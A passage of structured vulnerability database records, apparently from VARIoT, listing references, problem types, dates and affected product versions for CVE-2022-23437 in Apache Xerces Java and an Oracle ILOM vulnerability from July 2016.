"title": "hitachi-sec-2025-114 Software product security information",
"trust": 0.8,
"url": "https://lists.apache.org/thread/6pjwm10bb69kq955fzr1n0nflnjd27dl"
},
{
"title": "Xerces Security vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=183803"
},
{
"title": "Debian CVElist Bug Report Logs: libxerces2-java: CVE-2022-23437",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=a1fbd856d1d488007b4277fd666e30c1"
},
{
"title": "Red Hat: CVE-2022-23437",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-23437"
},
{
"title": "Hitachi Security Advisories: Vulnerability in Cosminexus XML Processor",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2022-129"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224922 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 8",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224919 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat JBoss Enterprise Application Platform 7.4.5 security update on RHEL 7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224918 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.13.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226813 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Hitachi Ops Center Common Services",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2022-136"
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/AlphabugX/CVE-2022-23305 "
},
{
"title": "CVE-2022-XXXX",
"trust": 0.1,
"url": "https://github.com/AlphabugX/CVE-2022-RCE "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-835",
"trust": 1.0
},
{
"problemtype": "BLIND XPath injection (CWE-91) [NVD evaluation ]",
"trust": 0.8
},
{
"problemtype": "CWE-91",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412572"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20221028-0005/"
},
{
"trust": 1.8,
"url": "https://lists.apache.org/thread/6pjwm10bb69kq955fzr1n0nflnjd27dl"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2022/01/24/3"
},
{
"trust": 1.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23437"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2799"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167423/red-hat-security-advisory-2022-4918-01.html"
},
{
"trust": 0.6,
"url": "https://vigilance.fr/vulnerability/apache-xerces-java-overload-37356"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.0760"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072056"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042544"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060838"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1653"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022042289"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022072096"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022041946"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022012503"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022071806"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168638/red-hat-security-advisory-2022-6813-01.html"
},
{
"trust": 0.5,
"url": "https://access.redhat.com/security/cve/cve-2022-23437"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-23913"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-21363"
},
{
"trust": 0.4,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2022-24785"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23913"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21363"
},
{
"trust": 0.4,
"url": "https://access.redhat.com/security/cve/cve-2020-36518"
},
{
"trust": 0.4,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36518"
},
{
"trust": 0.3,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0084"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43797"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0866"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0084"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37137"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-21299"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21299"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-42392"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-23221"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24785"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-43797"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-37137"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-42392"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1319"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-37136"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-1319"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_enterprise_application_platform/7.4/html-single/installation_guide/"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0866"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-37136"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0853"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-23221"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2022-0853"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/835.html"
},
{
"trust": 0.1,
"url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1016975"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/alphabugx/cve-2022-23305"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-24771"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-31129"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-21724"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-23436"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-7746"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1365"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44906"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0722"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0235"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1365"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-1650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-26520"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-44906"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24771"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-2458"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:6813"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-2458"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-24772"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-7746"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-21724"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2022-0722"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-1650"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4919"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4918"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?downloadtype=securitypatches\u0026product=appplatform\u0026version=7.4"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2022:4922"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-412572"
},
{
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"db": "PACKETSTORM",
"id": "168638"
},
{
"db": "PACKETSTORM",
"id": "167424"
},
{
"db": "PACKETSTORM",
"id": "167423"
},
{
"db": "PACKETSTORM",
"id": "167422"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
},
{
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-412572"
},
{
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"db": "PACKETSTORM",
"id": "168638"
},
{
"db": "PACKETSTORM",
"id": "167424"
},
{
"db": "PACKETSTORM",
"id": "167423"
},
{
"db": "PACKETSTORM",
"id": "167422"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
},
{
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-01-24T00:00:00",
"db": "VULHUB",
"id": "VHN-412572"
},
{
"date": "2022-01-24T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"date": "2022-10-06T12:37:43",
"db": "PACKETSTORM",
"id": "168638"
},
{
"date": "2022-06-07T15:15:05",
"db": "PACKETSTORM",
"id": "167424"
},
{
"date": "2022-06-07T15:14:53",
"db": "PACKETSTORM",
"id": "167423"
},
{
"date": "2022-06-07T15:14:37",
"db": "PACKETSTORM",
"id": "167422"
},
{
"date": "2022-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"date": "2022-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-2238"
},
{
"date": "2022-01-24T15:15:09.317000",
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-12-07T00:00:00",
"db": "VULHUB",
"id": "VHN-412572"
},
{
"date": "2023-08-08T00:00:00",
"db": "VULMON",
"id": "CVE-2022-23437"
},
{
"date": "2025-05-16T08:40:00",
"db": "JVNDB",
"id": "JVNDB-2022-002358"
},
{
"date": "2023-03-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202201-2238"
},
{
"date": "2024-11-21T06:48:33.283000",
"db": "NVD",
"id": "CVE-2022-23437"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Apache\u00a0Xerces\u00a0Java\u00a0XML\u00a0 Blinds in parsers \u00a0XPath\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-002358"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-2238"
}
],
"trust": 0.6
}
}
VAR-201607-0652
Vulnerability from variot - Updated: 2025-04-13 22:52Unspecified vulnerability in the ILOM component in Oracle Sun Systems Products Suite 3.0, 3.1, and 3.2 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. (DoS) An attack may be carried out. Oracle has released advance notification regarding the July 2016 Critical Patch Update (CPU) to be released on July 19, 2016. The update addresses 276 vulnerabilities affecting the following software: Oracle Application Express Oracle Database Server Oracle Access Manager Oracle BI Publisher Oracle Business Intelligence Enterprise Edition Oracle Directory Server Enterprise Edition Oracle Exalogic Infrastructure Oracle Fusion Middleware Oracle GlassFish Server Oracle HTTP Server Oracle JDeveloper Oracle Portal Oracle WebCenter Sites Oracle WebLogic Server Outside In Technology Hyperion Financial Reporting Enterprise Manager Base Platform Enterprise Manager for Fusion Middleware Enterprise Manager Ops Center Oracle E-Business Suite Oracle Agile Engineering Data Management Oracle Agile PLM Oracle Demand Planning Oracle Engineering Data Management Oracle Transportation Management PeopleSoft Enterprise FSCM PeopleSoft Enterprise PeopleTools JD Edwards EnterpriseOne Tools Siebel Applications Oracle Fusion Applications Oracle Communications ASAP Oracle Communications Core Session Manager Oracle Communications EAGLE Application Processor Oracle Communications Messaging Server Oracle Communications Network Charging and Control Oracle Communications Operations Monitor Oracle Communications Policy Management Oracle Communications Session Border Controller Oracle Communications Unified Session Manager Oracle Enterprise Communications Broker Oracle Banking Platform Oracle Financial Services Lending and Leasing Oracle FLEXCUBE Direct Banking Oracle Health Sciences Clinical Development Center Oracle Health Sciences Information Manager Oracle Healthcare Analytics Data Integration Oracle Healthcare Master Person Index Oracle Documaker Oracle Insurance Calculation Engine Oracle Insurance Policy Administration J2EE Oracle Insurance Rules Palette MICROS Retail XBRi Loss Prevention Oracle Retail Central Oracle Back Office Oracle Returns Management Oracle Retail Integration Bus Oracle Retail Order Broker Oracle Retail Service Backbone Oracle Retail Store Inventory Management Oracle Utilities Framework Oracle Utilities Network Management System Oracle Utilities Work and Asset Management Oracle In-Memory Policy Analytics Oracle Policy Automation Oracle Policy Automation Connector for Siebel Oracle Policy Automation for Mobile Devices Primavera Contract Management Primavera P6 Enterprise Project Portfolio Management Oracle Java SE Oracle Java SE Embedded Oracle JRockit 40G 10G 72/64 Ethernet Switch Fujitsu M10-1 Servers Fujitsu M10-4 Servers Fujitsu M10-4S Servers ILOM Oracle Switch ES1-24 Solaris Solaris Cluster SPARC Enterprise M3000 Servers SPARC Enterprise M4000 Servers SPARC Enterprise M5000 Servers SPARC Enterprise M8000 Servers SPARC Enterprise M9000 Servers Sun Blade 6000 Ethernet Switched NEM 24P 10GE Sun Data Center InfiniBand Switch 36 Sun Network 10GE Switch 72p Sun Network QDR InfiniBand Gateway Switch Oracle Secure Global Desktop Oracle VM VirtualBox MySQL Server Exploiting the most severe of these vulnerabilities may potentially compromise the database server or the host operating system. Oracle Integrated Lights Out Manager is prone to a remote security vulnerability in ILOM. The vulnerability can be exploited over the 'Multiple' protocol. The 'Authentication' sub component is affected. This vulnerability affects the following supported versions: 3.0, 3.1, 3.2. Oracle Sun Systems Products Suite is a Sun system product suite of Oracle Corporation
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201607-0652",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.2"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.1"
},
{
"model": "integrated lights out manager",
"scope": "eq",
"trust": 3.0,
"vendor": "oracle",
"version": "3.0"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.092"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.091"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7.0101"
},
{
"model": "jre update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6.0115"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.092"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.8.091"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.7.0101"
},
{
"model": "jdk update",
"scope": "eq",
"trust": 0.9,
"vendor": "oracle",
"version": "1.6.0115"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.3.60"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.3.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.18.0"
},
{
"model": "webcenter sites",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.2.1.0"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.16"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.14"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.13"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.12"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.11"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.10"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.9"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.8"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0.18"
},
{
"model": "vm virtualbox",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.0"
},
{
"model": "utilities work and asset management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.9.1.2.8"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.3.5"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.2.12"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.12.0.1.16"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.11.0.5.4"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.11.0.4.41"
},
{
"model": "utilities network management system",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.10.0.6.27"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.2.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.2.0.0.0"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.4.1"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.4"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.5"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.4"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.3"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.2"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.1"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.7"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3.6"
},
{
"model": "transportation management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.3"
},
{
"model": "switch es1-24",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.3"
},
{
"model": "sun network qdr infiniband gateway switch",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "0"
},
{
"model": "sun network 10ge switch 72p",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1.2"
},
{
"model": "sun data center infiniband switch",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "362.2.2"
},
{
"model": "sun blade ethernet switched nem 24p 10ge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "60001.2"
},
{
"model": "sparc enterprise m9000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m9000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m8000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m8000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m5000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m5000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m4000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m4000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "sparc enterprise m3000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1118"
},
{
"model": "sparc enterprise m3000 xcp",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "1117"
},
{
"model": "solaris cluster",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.3"
},
{
"model": "solaris cluster",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.3"
},
{
"model": "solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.2.2"
},
{
"model": "siebel applications ip2016",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications ip2015",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications ip2014",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5"
},
{
"model": "siebel applications",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.1"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "5.2"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.71"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.63"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"model": "retail store inventory management",
"scope": "eq",
"trust": 0.3,
